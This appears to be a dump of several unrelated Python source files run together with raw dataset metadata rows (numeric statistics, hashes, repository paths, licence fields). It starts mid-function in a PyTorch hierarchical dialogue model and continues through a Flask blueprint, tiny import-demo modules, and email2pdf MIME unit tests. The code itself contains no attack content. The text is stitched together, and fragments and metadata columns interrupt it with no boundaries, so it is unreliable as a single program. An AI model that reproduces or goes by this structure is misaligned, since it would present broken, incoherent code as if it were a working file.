target_sentences, decode=False, extra_context_inputs=None,
rl_mode=False):
"""
Args:
sentences: (Variable, LongTensor) [num_sentences + batch_size, seq_len]
target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
Return:
decoder_outputs: (Variable, FloatTensor)
- train: [batch_size, seq_len, vocab_size]
- eval: [batch_size, seq_len]
"""
batch_size = input_conversation_length.size(0)
num_sentences = sentences.size(0) - batch_size
max_len = input_conversation_length.data.max().item()
# encoder_outputs: [num_sentences + batch_size, max_source_length, hidden_size]
# encoder_hidden: [num_layers * direction, num_sentences + batch_size, hidden_size]
encoder_outputs, raw_encoder_hidden = self.encoder(sentences,
sentence_length)
# encoder_hidden: [num_sentences + batch_size, num_layers * direction * hidden_size]
context_inputs_2d = raw_encoder_hidden.transpose(
1, 0).contiguous().view(num_sentences + batch_size, -1)
if self.config.context_input_only:
context_inputs_2d = torch.cat(
(context_inputs_2d, extra_context_inputs), 1)
# pad and pack encoder_hidden
start = torch.cumsum(torch.cat((to_var(input_conversation_length.data.new(1).zero_()),
input_conversation_length[:-1] + 1)), 0)
# context_inputs: [batch_size, max_len + 1, num_layers * direction * hidden_size]
context_inputs = torch.stack([pad(context_inputs_2d.narrow(0, s, l + 1), max_len + 1)
for s, l in zip(start.data.tolist(),
input_conversation_length.data.tolist())], 0)
# context_inputs_inference: [batch_size, max_len, num_layers * direction * hidden_size]
context_inputs_inference = context_inputs[:, 1:, :]
context_inputs_inference_flat = torch.cat(
[context_inputs_inference[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
# context_inputs_input: [batch_size, max_len, num_layers * direction * hidden_size]
context_inputs_input = context_inputs[:, :-1, :]
# Standard Gaussian prior
conv_eps = to_var(torch.randn([batch_size, self.config.z_conv_size]))
conv_mu_prior, conv_var_prior = self.conv_prior()
if not rl_mode and not decode:
if self.config.sentence_drop > 0.0:
indices = np.where(np.random.rand(max_len) < self.config.sentence_drop)[0]
if len(indices) > 0:
context_inputs_input[:, indices, :] = self.unk_sent
# context_inference_outputs: [batch_size, max_len, num_directions * context_size]
# context_inference_hidden: [num_layers * num_directions, batch_size, hidden_size]
context_inference_outputs, context_inference_hidden = self.context_inference(
context_inputs, input_conversation_length + 1)
# context_inference_hidden: [batch_size, num_layers * num_directions * hidden_size]
context_inference_hidden = context_inference_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
conv_mu_posterior, conv_var_posterior = self.conv_posterior(context_inference_hidden)
z_conv = conv_mu_posterior + torch.sqrt(conv_var_posterior) * conv_eps
log_q_zx_conv = normal_logpdf(z_conv, conv_mu_posterior, conv_var_posterior).sum()
log_p_z_conv = normal_logpdf(z_conv, conv_mu_prior, conv_var_prior).sum()
kl_div_conv = normal_kl_div(conv_mu_posterior, conv_var_posterior,
conv_mu_prior, conv_var_prior).sum()
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
z_conv_expand = z_conv.view(z_conv.size(0), 1, z_conv.size(
1)).expand(z_conv.size(0), max_len, z_conv.size(1))
context_outputs, context_last_hidden = self.context_encoder(
torch.cat([context_inputs_input, z_conv_expand], 2),
input_conversation_length,
hidden=context_init)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
z_conv_flat = torch.cat(
[z_conv_expand[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
sent_mu_prior, sent_var_prior = self.sent_prior(context_outputs, z_conv_flat)
eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))
sent_mu_posterior, sent_var_posterior = self.sent_posterior(
context_outputs, context_inputs_inference_flat, z_conv_flat)
z_sent = sent_mu_posterior + torch.sqrt(sent_var_posterior) * eps
log_q_zx_sent = normal_logpdf(z_sent, sent_mu_posterior, sent_var_posterior).sum()
log_p_z_sent = normal_logpdf(z_sent, sent_mu_prior, sent_var_prior).sum()
# kl_div: [num_sentences]
kl_div_sent = normal_kl_div(sent_mu_posterior, sent_var_posterior,
sent_mu_prior, sent_var_prior).sum()
kl_div = kl_div_conv + kl_div_sent
log_q_zx = log_q_zx_conv + log_q_zx_sent
log_p_z = log_p_z_conv + log_p_z_sent
else:
z_conv = conv_mu_prior + torch.sqrt(conv_var_prior) * conv_eps
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
z_conv_expand = z_conv.view(z_conv.size(0), 1, z_conv.size(
1)).expand(z_conv.size(0), max_len, z_conv.size(1))
# context_outputs: [batch_size, max_len, context_size]
context_outputs, context_last_hidden = self.context_encoder(
torch.cat([context_inputs_input, z_conv_expand], 2),
input_conversation_length,
hidden=context_init)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
z_conv_flat = torch.cat(
[z_conv_expand[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
sent_mu_prior, sent_var_prior = self.sent_prior(context_outputs, z_conv_flat)
eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))
z_sent = sent_mu_prior + torch.sqrt(sent_var_prior) * eps
kl_div = None
log_p_z = normal_logpdf(z_sent, sent_mu_prior, sent_var_prior).sum()
log_p_z += normal_logpdf(z_conv, conv_mu_prior, conv_var_prior).sum()
log_q_zx = None
# Predict emojis using discriminator.
emoji_preds = None
if self.config.emotion:
emoji_preds = self.context2emoji(context_outputs)
# Predict sentence embeddings using discriminator.
infersent_preds = None
if self.config.infersent:
infersent_preds = self.context2infersent(context_outputs)
# expand z_conv to all associated sentences
z_conv = torch.cat([z.view(1, -1).expand(m.item(), self.config.z_conv_size)
for z, m in zip(z_conv, input_conversation_length)])
# latent_context: [num_sentences, context_size + z_sent_size +
# z_conv_size]
latent_context = torch.cat([context_outputs, z_sent, z_conv], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(-1,
self.decoder.num_layers,
self.decoder.hidden_size)
decoder_init = decoder_init.transpose(1, 0).contiguous()
# train: [batch_size, seq_len, vocab_size]
# eval: [batch_size, seq_len]
if rl_mode or not decode:
decoder_outputs = self.decoder(target_sentences,
init_h=decoder_init,
decode=decode)
return (decoder_outputs, kl_div, log_p_z, log_q_zx,
emoji_preds, infersent_preds)
else:
# prediction: [batch_size, beam_size, max_unroll]
prediction, final_score, length = self.decoder.beam_decode(
init_h=decoder_init)
return (prediction, kl_div, log_p_z, log_q_zx,
emoji_preds, infersent_preds)
def generate(self, context, sentence_length, n_context,
extra_context_inputs=None, botmoji=None, botsent=None,
vocab=None):
# context: [batch_size, n_context, seq_len]
batch_size = context.size(0)
# n_context = context.size(1)
samples = []
# Run for context
conv_eps = to_var(torch.randn([batch_size, self.config.z_conv_size]))
# conv_mu_prior, conv_var_prior = self.conv_prior()
# z_conv = conv_mu_prior + torch.sqrt(conv_var_prior) * conv_eps
context_inputs_list = []
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, raw_encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
# encoder_hidden: [batch_size, num_layers * direction * hidden_size]
context_inputs_2d = raw_encoder_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
if self.config.context_input_only:
context_inputs_2d = torch.cat(
(context_inputs_2d, extra_context_inputs), 1)
context_inputs_list.append(context_inputs_2d)
context_inputs = torch.stack(context_inputs_list, 1)
(context_inference_outputs,
context_inference_hidden) = self.context_inference(
context_inputs, to_var(torch.LongTensor([n_context] * batch_size)))
context_inference_hidden = context_inference_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
conv_mu_posterior, conv_var_posterior = self.conv_posterior(context_inference_hidden)
z_conv = conv_mu_posterior + torch.sqrt(conv_var_posterior) * conv_eps
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
context_hidden = context_init
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, raw_encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
# encoder_hidden: [batch_size, num_layers * direction *
context_inputs_2d = raw_encoder_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
if self.config.context_input_only:
context_inputs_2d = torch.cat(
(context_inputs_2d, extra_context_inputs), 1)
context_inputs_list.append(context_inputs_2d)
# context_outputs: [batch_size, 1, context_hidden_size * direction]
# context_hidden: [num_layers * direction, batch_size, context_hidden_size]
context_outputs, context_hidden = self.context_encoder.step(
torch.cat([context_inputs_2d, z_conv], 1), context_hidden)
# Run for generation
for j in range(self.config.n_sample_step):
# context_outputs: [batch_size, context_hidden_size * direction]
context_outputs = context_outputs.squeeze(1)
mu_prior, var_prior = self.sent_prior(context_outputs, z_conv)
eps = to_var(torch.randn((batch_size, self.config.z_sent_size)))
z_sent = mu_prior + torch.sqrt(var_prior) * eps
latent_context = torch.cat([context_outputs, z_sent, z_conv], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
if self.config.sample:
prediction = self.decoder(None, decoder_init, decode=True)
p = prediction.data.cpu().numpy()
length = torch.from_numpy(np.where(p == EOS_ID)[1])
else:
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# prediction: [batch_size, seq_len]
prediction = prediction[:, 0, :]
# length: [batch_size]
length = [l[0] for l in length]
length = to_var(torch.LongTensor(length))
samples.append(prediction)
encoder_outputs, raw_encoder_hidden = self.encoder(prediction,
length)
context_inputs_2d = raw_encoder_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
# Dynamically assess the DeepMoji and Infersent predictions on
# generated text
if self.config.context_input_only:
dynamic_context_inputs = dynamically_assess_context_inputs(
prediction, botmoji, botsent, vocab, self.config)
context_inputs_2d = torch.cat(
(context_inputs_2d, dynamic_context_inputs), 1)
context_outputs, context_hidden = self.context_encoder.step(
torch.cat([context_inputs_2d, z_conv], 1), context_hidden)
samples = torch.stack(samples, 1)
return samples
def dynamically_assess_context_inputs(gen_response, botmoji, botsent, vocab,
config):
gen_response = gen_response.view(-1,30).cpu().numpy()
# Translate tokens to words and detokenize
decoded_response = [vocab.decode(list(g)) for g in gen_response] # needs to be higher dimensional?
decoded_response = [detokenize(d) for d in decoded_response]
# Assess DeepMoji and Infersent on text
try:
infersent_sentences = to_var(torch.FloatTensor(
[botsent.encode(s) for s in decoded_response]))
blank_deepmoji = [1.0 / config.emo_output_size] * config.emo_output_size
emoji_sentences = to_var(torch.FloatTensor(
[botmoji.encode(s) if s != '' else blank_deepmoji for s in decoded_response]))
except Exception as e:
print("Error in dynamic context iputs:")
print(str(e))
return torch.cat((emoji_sentences, infersent_sentences), 1)
| 48.781124
| 127
| 0.572367
| 5,129
| 48,586
| 5.069019
| 0.050107
| 0.048002
| 0.026809
| 0.023886
| 0.883188
| 0.857879
| 0.830686
| 0.810531
| 0.792992
| 0.774107
| 0
| 0.007279
| 0.352447
| 48,586
| 995
| 128
| 48.830151
| 0.819083
| 0.137406
| 0
| 0.750371
| 0
| 0
| 0.000962
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02526
| false
| 0
| 0.007429
| 0.001486
| 0.063893
| 0.002972
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc2659709eefdbd31922fdc217b27bac8b7aabca
| 158
|
py
|
Python
|
blog/modules/profile/__init__.py
|
feel-easy/flask_blog
|
dd4f9b1bec85e32fa4080f638e2b7034ad16ef4c
|
[
"Apache-2.0"
] | 1
|
2019-03-19T11:00:44.000Z
|
2019-03-19T11:00:44.000Z
|
blog/modules/profile/__init__.py
|
feel-easy/flask_blog
|
dd4f9b1bec85e32fa4080f638e2b7034ad16ef4c
|
[
"Apache-2.0"
] | 6
|
2021-03-18T22:44:46.000Z
|
2022-03-11T23:42:59.000Z
|
blog/modules/profile/__init__.py
|
feel-easy/flask_blog
|
dd4f9b1bec85e32fa4080f638e2b7034ad16ef4c
|
[
"Apache-2.0"
] | null | null | null |
from flask import Blueprint
profile_blue = Blueprint('profile_blue', __name__, url_prefix='/user')
# RESTful:表现层状态转换,开发web项目需要具备的风格特点。
from . import views
| 19.75
| 70
| 0.78481
| 19
| 158
| 6.157895
| 0.736842
| 0.273504
| 0.34188
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113924
| 158
| 7
| 71
| 22.571429
| 0.835714
| 0.208861
| 0
| 0
| 0
| 0
| 0.138211
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
fc9a532c09486e975b6bbdda439c73f79bd7de86
| 132
|
py
|
Python
|
code/frameworks/pisr/utils/__init__.py
|
wukailu/EDSR-PyTorch
|
5625cf83ce88050b68e649beb4155b32c38018fa
|
[
"MIT"
] | null | null | null |
code/frameworks/pisr/utils/__init__.py
|
wukailu/EDSR-PyTorch
|
5625cf83ce88050b68e649beb4155b32c38018fa
|
[
"MIT"
] | null | null | null |
code/frameworks/pisr/utils/__init__.py
|
wukailu/EDSR-PyTorch
|
5625cf83ce88050b68e649beb4155b32c38018fa
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from .utils import *
| 18.857143
| 38
| 0.848485
| 17
| 132
| 5.764706
| 0.470588
| 0.306122
| 0.489796
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136364
| 132
| 6
| 39
| 22
| 0.859649
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.25
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5d91496cb7c84a173933bb615d89b056740283dc
| 116
|
py
|
Python
|
accepted/chennaipy/october/samplecode/explicitimports/bar.py
|
tasdikrahman/talks
|
bba44283e149ab27fb8cc2f6f8644adf9f2c8a11
|
[
"MIT"
] | 1
|
2017-04-16T06:59:02.000Z
|
2017-04-16T06:59:02.000Z
|
accepted/chennaipy/october/samplecode/explicitimports/bar.py
|
prodicus/talks
|
bba44283e149ab27fb8cc2f6f8644adf9f2c8a11
|
[
"MIT"
] | null | null | null |
accepted/chennaipy/october/samplecode/explicitimports/bar.py
|
prodicus/talks
|
bba44283e149ab27fb8cc2f6f8644adf9f2c8a11
|
[
"MIT"
] | 1
|
2019-10-26T00:28:07.000Z
|
2019-10-26T00:28:07.000Z
|
# explicitimports/bar.py
class Bar(object):
pass
print("inside 'explicitimports/bar.py'")
from . import foo
| 11.6
| 40
| 0.706897
| 15
| 116
| 5.466667
| 0.733333
| 0.439024
| 0.487805
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163793
| 116
| 9
| 41
| 12.888889
| 0.845361
| 0.189655
| 0
| 0
| 0
| 0
| 0.340659
| 0.263736
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0.25
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
5d93fde8b2e8402fa6de12253767d21ce8278b91
| 17,136
|
py
|
Python
|
tests/Subprocess/test_Subprocess_MIME.py
|
pyscioffice/email2pdf
|
584833e86113c2957583403bb7c0d7f8ebea755b
|
[
"MIT"
] | 1
|
2022-03-10T20:36:16.000Z
|
2022-03-10T20:36:16.000Z
|
tests/Subprocess/test_Subprocess_MIME.py
|
pyscioffice/email2pdf
|
584833e86113c2957583403bb7c0d7f8ebea755b
|
[
"MIT"
] | null | null | null |
tests/Subprocess/test_Subprocess_MIME.py
|
pyscioffice/email2pdf
|
584833e86113c2957583403bb7c0d7f8ebea755b
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from email.mime.multipart import MIMEMultipart
import os
import tempfile
from tests.BaseTestClasses import Email2PDFTestCase
class TestMIME(Email2PDFTestCase):
def setUp(self):
super(TestMIME, self).setUp()
self.msg = MIMEMultipart()
def test_noheaders(self):
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_simple(self):
self.addHeaders()
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_nosubject(self):
self.addHeaders(Email2PDFTestCase.DEFAULT_FROM, Email2PDFTestCase.DEFAULT_TO, None)
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_html(self):
self.addHeaders()
self.attachHTML("<p>Some basic textual content</p>")
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some\sbasic\stextual\scontent")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_attachtext_upsidedown(self):
self.addHeaders()
self.attachText("ɯɐɹƃoɹd ɟpdᄅlᴉɐɯǝ ǝɥʇ ɟo ʇsǝʇ ɐ sᴉ sᴉɥʇ ollǝH")
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertTrue(self.existsByTime())
self.assertEqual('', error)
self.assertRegex(self.getPDFText(self.getTimedFilename()), "ɯɐɹƃoɹd ɟpd lᴉɐɯǝ ǝɥʇ ɟo ʇsǝʇ ɐ sᴉ sᴉɥʇ ollǝH\n\n\x0c")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_attachhtml_upsidedown(self):
self.addHeaders()
self.attachHTML("<p>ɯɐɹƃoɹd ɟpdᄅlᴉɐɯǝ ǝɥʇ ɟo ʇsǝʇ ɐ sᴉ sᴉɥʇ ollǝH</p>")
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertTrue(self.existsByTime())
self.assertEqual('', error)
self.assertRegex(self.getPDFText(self.getTimedFilename()), "ɯɐɹƃoɹd ɟpd lᴉɐɯǝ ǝɥʇ ɟo ʇsǝʇ ɐ sᴉ sᴉɥʇ ollǝH\n\n\x0c")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_html_entities_currency(self):
path = os.path.join(self.examineDir, "htmlEntitiesCurrency.pdf")
self.addHeaders()
self.attachHTML(b'<span>Pounds: \xc2\xa37.14, Another Pounds: £7.14</span>'.decode('utf-8'))
(rc, output, error) = self.invokeAsSubprocess(outputFile=path)
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(os.path.exists(path))
self.assertRegex(self.getPDFText(path), "Pounds:\s£7.14,\sAnother\sPounds:\s£7.14")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_html_poundsign_iso88591(self):
self.addHeaders()
path = os.path.join(self.examineDir, "html_poundsign_iso88591.pdf")
self.attachHTML("Hello - this email costs \xa35!", charset="ISO-8859-1")
(rc, output, error) = self.invokeAsSubprocess(outputFile=path)
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(os.path.exists(path))
self.assertRegex(self.getPDFText(path), "Hello\s-\sthis\semail\scosts\s\xa35!")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_text_poundsign_iso88591(self):
self.addHeaders()
path = os.path.join(self.examineDir, "text_poundsign_iso88591.pdf")
self.attachText("Hello - this email costs \xa35!", charset="ISO-8859-1")
(rc, output, error) = self.invokeAsSubprocess(outputFile=path)
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(os.path.exists(path))
self.assertRegex(self.getPDFText(path), "Hello\s-\sthis\semail\scosts\s\xa35!")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_plaincontent_poundsign_utf8_8bit(self):
input_email = ("From: \"XYZ\" <xyz@abc.uk>\n"
"To: \"XYZ\" <xyz@gmail.com>\n"
"Subject: Blah\n"
"Content-Type: multipart/mixed; boundary=\"CUT-HERE--\"\n"
"\n"
"--CUT-HERE--\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"\n"
"Price is £45.00\n"
"--CUT-HERE----\n")
path = os.path.join(self.examineDir, "plaincontent_poundsign_utf8_8bit.pdf")
(rc, output, error) = self.invokeAsSubprocess(inputFile=input_email, outputFile=path,
extraParams=['--input-encoding=utf-8'])
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(os.path.exists(path))
self.assertRegex(self.getPDFText(path), "Price\sis\s£45.00")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_plainandhtml(self):
self.addHeaders()
self.attachText("Some basic textual content")
self.attachHTML("<p>Some basic HTML content</p>")
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some\sbasic\sHTML\scontent")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_wrong_charset_html(self):
self.addHeaders()
broken_body = b"<p>Something with raw accents: \xe9</p>"
self.attachHTML(broken_body, charset="utf-8")
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Something\swith\sraw\saccents:\s\é")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_pdf(self):
self.addHeaders()
self.attachText("Some basic textual content")
filename = self.attachPDF("Some PDF content")
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some\sbasic\stextual\scontent")
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, filename)), "Some\sPDF\scontent")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_plaincontent_outputfileoverrides_with_attachments(self):
mainFilename = os.path.join(self.examineDir, "outputFileOverridesWithAttachments.pdf")
self.attachText("Hello!")
attachmentFilename = self.attachPDF("Some PDF content")
with tempfile.TemporaryDirectory() as tempdir:
(rc, output, error) = self.invokeAsSubprocess(outputDirectory=tempdir, outputFile=mainFilename)
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertFalse(self.existsByTime())
self.assertFalse(self.existsByTime(tempdir))
self.assertFalse(os.path.exists(os.path.join(tempdir, "outputFileOverrides.pdf")))
self.assertFalse(os.path.exists(os.path.join(self.workingDir, "outputFileOverrides.pdf")))
self.assertTrue(os.path.exists(mainFilename))
self.assertFalse(os.path.exists(os.path.join(self.examineDir, attachmentFilename)))
self.assertFalse(os.path.exists(os.path.join(self.workingDir, attachmentFilename)))
self.assertTrue(os.path.exists(os.path.join(tempdir, attachmentFilename)))
self.assertRegex(self.getPDFText(mainFilename), "Hello!")
self.assertRegex(self.getPDFText(os.path.join(tempdir, attachmentFilename)), "Some\sPDF\scontent")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_remote_image_does_exist(self):
if self.isOnline:
path = os.path.join(self.examineDir, "remoteImageDoesExist.pdf")
self.addHeaders()
self.attachHTML('<img src="' + self.EXIST_IMG + '">')
(rc, output, error) = self.invokeAsSubprocess(outputFile=path)
self.assertEqual(2, rc)
self.assertEqual('ERROR:', error.split()[0])
self.assertTrue(os.path.exists(path))
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
else:
self.skipTest("Not online.")
def test_remote_image_does_exist_uppercase(self):
if self.isOnline:
path = os.path.join(self.examineDir, "remoteImageDoesExistUppercase.pdf")
self.addHeaders()
self.attachHTML('<img src="' + self.EXIST_IMG_UPPERCASE + '">')
(rc, output, error) = self.invokeAsSubprocess(outputFile=path)
self.assertEqual(2, rc)
self.assertEqual('ERROR:', error.split()[0])
self.assertTrue(os.path.exists(path))
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
else:
self.skipTest("Not online.")
def test_non_embedded_image_jpeg(self):
self.addHeaders()
self.attachText("Hello!")
imageFilename = self.attachImage(jpeg=True)
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, imageFilename)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Hello!")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_non_embedded_image_jpeg_add_prefix_date(self):
self.addHeaders()
self.attachText("Hello!")
imageFilename = self.attachImage(jpeg=True)
(rc, output, error) = self.invokeAsSubprocess(extraParams=['--add-prefix-date'])
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, datetime.now().strftime("%Y-%m-%d-") + imageFilename)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Hello!")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_non_embedded_image_png(self):
self.addHeaders()
self.attachText("Hello!")
imageFilename = self.attachImage(jpeg=False)
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, imageFilename)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Hello!")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_non_embedded_image_and_pdf(self):
self.addHeaders()
self.attachText("Hello!")
imageFilename = self.attachImage()
filename = self.attachPDF("Some PDF content")
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename)))
self.assertTrue(os.path.exists(os.path.join(self.workingDir, imageFilename)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Hello!")
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, filename)), "Some\sPDF\scontent")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_2pdfs(self):
self.addHeaders()
self.attachText("Some basic textual content")
filename = self.attachPDF("Some PDF content")
filename2 = self.attachPDF("Some More PDF content")
self.assertFalse(os.path.exists(os.path.join(self.workingDir, filename)))
self.assertFalse(os.path.exists(os.path.join(self.workingDir, filename2)))
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename)))
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename2)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, filename)), "Some PDF content")
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, filename2)), "Some More PDF content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_pdf_exists(self):
self.addHeaders()
self.attachText("Some basic textual content")
filename = self.attachPDF("Some PDF content")
self.assertFalse(os.path.exists(os.path.join(self.workingDir, filename)))
self.touch(os.path.join(self.workingDir, filename))
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename)))
rootName, unused_extension = os.path.splitext(filename)
uniqueName = rootName + "_1.pdf"
self.assertTrue(os.path.exists(os.path.join(self.workingDir, uniqueName)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertIsNone(self.getPDFText(os.path.join(self.workingDir, filename)))
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, uniqueName)), "Some PDF content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
